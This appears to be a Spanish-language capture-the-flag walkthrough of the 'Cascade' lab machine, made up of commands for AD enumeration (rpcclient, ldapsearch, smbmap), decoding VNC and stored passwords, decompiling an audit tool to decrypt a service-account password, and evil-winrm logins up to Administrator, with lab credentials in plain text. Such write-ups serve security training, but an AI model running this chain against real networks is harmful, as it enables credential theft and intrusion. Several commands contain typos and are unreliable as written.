nmap -A -p- -oA mango 10.129.1.219 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mango 10.129.1.219

nmap -sU -O -p- -oA mango-udp 10.129.1.219

nikto -h 10.129.1.219:80

Pasted image 20211215142910.png

Pasted image 20211215143150.png

echo "10.129.205.71 cascade.local" | sudo tee -a /etc/hosts

Pasted image 20211215142812.png

rpcclient -U "" 10.129.205.71 -N

Pasted image 20211215145650.png

rpcclient -U "" 10.129.205.71 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]'

Pasted image 20211215150125.png

sudo ./rpcenum -e DUsersInfo -i 10.129.205.71

Pasted image 20211215151701.png

Se usa GetNPUsers si tienes usuarios pero no contrasenas Pero no encontramos nada

python3 /opt/impacket/examples/GetNPUsers.py cascade.local/ -no-pass -usersfile users

Pasted image 20211215152135.png

Corremos lo siguiente con las herramientas de smbclient y smbmap

smbmap -H 10.129.205.71

smbclient -L 10.129.205.71 -N

Pasted image 20211215152517.png

ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local"

Pasted image 20211215154144.png

ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local" -A 20

Pasted image 20211215160115.png

Pasted image 20211215160600.png

echo "clk0bjVldmE=" | base64 -d; echo

Pasted image 20211215160750.png

rpcclient -U "" 10.129.205.71 -N -c "queryuser r.thompson"

Pasted image 20211215161931.png

crackmapexec smb 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'

Pasted image 20211215162136.png

Parece que no es un usuario que tenga acceso remoto

Pasted image 20211215162300.png

smbmap -H 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'

Pasted image 20211215163504.png

smbclient //10.129.205.71/Data -U 'r.thompson%rY4n5eva'

Pasted image 20211215163815.png

Como tenemos varios directorios

sudo mkdir /mnt/smbmounted

Pasted image 20211215165000.png

smb mount -t cifs //10.129.205.71/Data /mnt/smbmounted -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw

Pasted image 20211215165020.png

Para no estar viendo y metiendonos en un directorio haciendo cd .. cd directorio etc

cd /mnt/submounted

tree

Pasted image 20211215165213.png

cp /mnt/smbmounted/IT/Email\ Archives/Meeting Notes June 2018.html index.html

Pasted image 20211215172340.png

Vemos lo que se encuentra en index.html El usuario

Pasted image 20211215173017.png

pushd /mnt/smbmounted /mnt/smbmounted ~/Desktop/boxes/cascade/content

tree

Pasted image 20211215173424.png

Pasted image 20211215173632.png

cp /mnt/smbmounted/IT/Logs/Ark\ AD\Recycle\ Bin/ArkAdRecycleBin.log .

cat ArkAdRecycleBin.log

Pasted image 20211215174812.png

Vemos el archivo VNC Install.reg

grep -i "Ark" users

Pasted image 20211215175024.png

file VNC Install.reg

Pasted image 20211215181559.png

Pasted image 20211215181704.png

Para cambiarlo de hexadecimal a string

echo "6b,cf,2a,4b,6e,5a,ca,0f" | tr -d ',' | xxd -ps -r > password

Pasted image 20211215181942.png

https://github.com/jeroennijhof/vncpwd

Pasted image 20211215182709.png

./vncpwd ../password

Pasted image 20211215182759.png

crackmapexec smb 10.129.205.71 -u ../users -p 'sT333ve2'

Pasted image 20211215182922.png

crackmapexec smb 10.129.205.71 -u 's.smith' -p 'sT333ve2'

Pasted image 20211215183031.png

evil-winrm -i 10.129.205.71 -u 's.smith' -p 'sT333ve2'

Pasted image 20211215190501.png

net user

net user s.smith

Pasted image 20211215190926.png

smbmap -H 10.129.205.71 -u 's.smith' -p 'sT333ve2'

Pasted image 20211215191408.png

cd C:\Shares\Audit

smbclient //10.129.205.71/Audit$ -U 's.smith%sT333ve2'

Pasted image 20211215191820.png

download C:\Shares\Audit\CascAudit.exe

mv C:\\Shares\\Audit\\CascAudit.exe ../CascAudit.exe

Pasted image 20211215192104.png

Para bajar todos los archivos en smb

prompt off recurse on mget *

Pasted image 20211215192257.png Pasted image 20211215192318.png

cd DB

file Audit.db

Pasted image 20211215193010.png

sqlite3 Audit.db

.tables

select * from Ldap;

Pasted image 20211215193026.png

echo "BQO5.." | base64 -d > arksvc_passwd

Pasted image 20211215193405.png

Encontramos el ejecutable CascAudit.exe

Pasted image 20211215193520.png

Lo (CascAudit.exe) abrimos con JetBrains dotPeek

Pasted image 20211215194434.png

Lo (Crypto.dll) abrimos con JetBrains dotPeek

Pasted image 20211215194845.png

Nos dirigimos a cyber chef. Introducimos la key y el vector IV

Pasted image 20211215195316.png

credenciales-> arksvc:w3lc0meFr31nd

Pasted image 20211215195452.png

evil-winrmm -t 10.129.205.71 -u 'arksvc' -p 'w3lc0meFr31nd'

Pasted image 20211215195535.png

whoami /priv

Pasted image 20211215195627.png

Get-ADObject -Filter 'Deleted -eq $true' -IncludeDeletedObjects -Properties *

Pasted image 20211215213123.png

echo "YmFDVDN.." | base64 -d

evil-winrmm -t 10.129.205.71 -u 'Administrator' -p 'baCT3r1aN00dles'

Pasted image 20211215213331.png

boxes

copyright©2022 Cu3rv0x all rights reserved